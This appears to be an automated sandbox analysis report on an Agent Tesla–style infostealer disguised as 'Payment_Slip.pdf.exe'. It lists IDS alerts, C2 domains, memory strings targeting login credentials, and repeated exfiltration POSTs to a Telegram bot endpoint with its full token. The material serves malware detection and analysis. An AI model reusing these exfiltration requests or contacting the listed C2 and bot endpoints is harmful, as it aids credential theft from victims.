Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49753 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49744 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49757 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49761 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49749 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49733 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49743 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49743 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49735 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49754 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49733 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49733 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49762 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49755 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49764 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49762 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49762 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49757 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49771 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49744 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49767 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49749 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49761 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49759 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49765 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49754 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49769 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49767 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49765 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49759 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49753 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49753 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49769 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49763 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49763 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: ratianaana701.bounceme.net
Source: Malware configuration extractor	URLs: milala.duckdns.org

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	TCP traffic: 192.168.2.4:49720 -> 103.186.117.228:9373
Source: global traffic	TCP traffic: 192.168.2.4:49731 -> 66.102.1.109:587
Source: global traffic	TCP traffic: 192.168.2.4:49766 -> 74.125.71.108:587

Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63c7c30640d9Host: api.telegram.orgContent-Length: 968Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63d5b8d96e57Host: api.telegram.orgContent-Length: 7553Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63c7d00704e1Host: api.telegram.orgContent-Length: 968Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63d890031cdeHost: api.telegram.orgContent-Length: 7553Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63c7d9acfd77Host: api.telegram.orgContent-Length: 7553Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6fe1c3fdf431Host: api.telegram.orgContent-Length: 930Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6fe75b7b2864Host: api.telegram.orgContent-Length: 67009Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd750e94b613a4Host: api.telegram.orgContent-Length: 67009Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd701f240ba35cHost: api.telegram.orgContent-Length: 67009Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd79f459671188Host: api.telegram.orgContent-Length: 67009Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd83b7ecb4b731Host: api.telegram.orgContent-Length: 71981Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd842d776ffebaHost: api.telegram.orgContent-Length: 1083Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd8431aa5955fdHost: api.telegram.orgContent-Length: 67150Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd8a92e30665c3Host: api.telegram.orgContent-Length: 67013Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd9f0bac1b425aHost: api.telegram.orgContent-Length: 67013Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63ba5cba4639Host: api.telegram.orgContent-Length: 67009Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63ba5cbf0ac5Host: api.telegram.orgContent-Length: 67009Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63ba5ce792d8Host: api.telegram.orgContent-Length: 67009Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View

ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49726 -> 178.237.33.50:80

Source: global traffic	TCP traffic: 192.168.2.4:49731 -> 66.102.1.109:587
Source: global traffic	TCP traffic: 192.168.2.4:49766 -> 74.125.71.108:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

11_2_0041936B

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: Payment_Slip.pdf.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1242674195.000000000155D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imgres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1242674195.000000000155D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imgres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: ratianaana701.bounceme.net
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: smtp.gmail.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63c7c30640d9Host: api.telegram.orgContent-Length: 968Expect: 100-continueConnection: Keep-Alive

Source: conserver.exe, 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Windows Update.exe, 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: host.exe, 0000000C.00000002.3622366959.0000000002742000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000283C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002707000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000003050000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.000000000307B000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000003146000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067BC000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/r/r1.crl0
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.000000000614D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/wr2/oBFYYahzgVI.crl0
Source: bhv8E9.tmp.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv8E9.tmp.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007300000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
Source: svchost.exe, 0000000A.00000002.2826707788.000001F041607000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: bhv8E9.tmp.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv8E9.tmp.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv8E9.tmp.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: Windows Update.exe, 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://eBhMtB.com
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041468000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.10.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.10.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.10.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041468000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041468000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000000A.00000003.1203278984.000001F04149D000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.10.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001392000.00000004.00000020.00020000.00000000.sdmp, mHTmhPhJy.exe, dwn.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: Payment_Slip.pdf.exe, 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, mHTmhPhJy.exe, 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, mHTmhPhJy.exe, 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, dwn.exe, 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, dwn.exe, 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, dwn.exe.5.dr	String found in binary or memory: http://geoplugin.net/json.gp/C
